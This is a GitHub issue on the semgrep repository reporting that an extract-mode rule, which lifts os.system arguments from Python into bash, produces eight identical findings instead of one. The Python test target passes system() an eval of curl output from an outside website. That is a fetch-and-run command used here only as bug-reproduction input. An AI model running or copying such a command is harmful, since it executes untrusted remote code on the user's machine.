### ISSUE TITLE
extract mode provides many identical findings

### ISSUE THREAD

**Issue by gand3lf** [semgrep/semgrep#7348]
Hi guys!
For this example I can't provide a playground link.
Consider these two rules (one in extract mode) and the related target file:
- rule1.yaml
```
rules:
  - id: mytest
    message: mymessage
    severity: WARNING
    languages:
      - bash
    patterns:
      - pattern: ...
```
- rule2.yaml
```
rules:
  - id: extract-python-os-system-to-bash
    mode: extract
    languages:
      - python
    pattern: os.system("$CMD")
    extract: $CMD
    dest-language: bash
```
- target.py
```
from os import system

if system('eval `curl -s "http://www.very-secure-website.net"`'):
    print("Command failed!")
else:
    print("Success")
```

Launching Semgrep in this way:
`semgrep -c rule1.yaml -c rule2.yaml target.py`

I obtain 8 identical findings and not only one as expected. It seems to be a bug, is it right?

Thank you
